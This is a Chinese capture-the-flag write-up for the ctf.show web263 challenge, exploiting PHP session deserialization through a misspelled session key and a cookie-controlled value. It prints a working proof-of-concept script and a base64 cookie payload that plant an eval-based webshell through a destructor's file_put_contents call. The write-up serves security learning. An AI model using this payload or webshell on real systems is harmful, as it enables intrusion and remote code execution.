题目链接

https://ctf.show/challenges#web263-723

解题思路

进去先是一个登录框

目录扫描一下发现存在源码泄露

查看源码

index.php

error_reporting(0);session_start();//超过5次禁止登陆if(isset($_SESSION['limit'])){$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);}else{setcookie("limit",base64_encode('1'));$_SESSION['limit']= 1;}?>

这里的$_SESSION['limit']是可控变量

并且

$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);

这里的limit拼写错误

只会执行后面的语句

并且后面这里会跳转到check.php

check.php头部这里包含了inc.php

inc.php这里声明了读取session的处理器为‘php’

看别人的wp分析 猜测这里phpini的默认处理器应该不为php 才在这里声明的

这个猜测非常有道理

（要是不是的话，这题就没有session反序列化漏洞了）

继续往下看

class User{public $username;public $password;public $status;function __construct($username,$password){$this->username = $username;$this->password = $password;}function setStatus($s){$this->status=$s;}function __destruct(){file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));}
}

这里定义了User类

可以通过file_put_contents（）这个函数写入一句话木马

inc.php里面没有反序列的代码

但是当session_start()被执行时

会解析session文件里面的内容（用php处理器）（把它反序列化）然后这里就会触发_destruct()析构函数

到这里这题思路就比较清楚

通过可控变量$_SESSION['limit']构造shell

通过inc.php反序列化触发析构函数 用file_put_contents（）写入一句话木马getshell

wp

构造poc

<?php
class User
{public $username;public $password;public $status;// 构造函数，用于初始化对象的属性function __construct($username, $password){$this->username = $username;$this->password = $password;}
}$a = new User('1.php', '<?php @eval($_POST["lcycb"]);?>');
echo '|'.serialize($a);echo base64_encode('|'.serialize($a)); // 序列化并对结果进行 Base64 编码

payload：

fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czozMToiPD9waHAgQGV2YWwoJF9QT1NUWyJsY3ljYiJdKTs/PiI7czo2OiJzdGF0dXMiO047fQ==

抓包修改limit的值

注意这里要发两次

第一次生成sessionid创建会话

访问check.php触发析构函数 使文件写入

然后访问我们传上去的木马

注意路径

这里直接传在跟目录下的

还有文件名字

前面要加“log-”

访问一下 发现传入成功

即可得到flag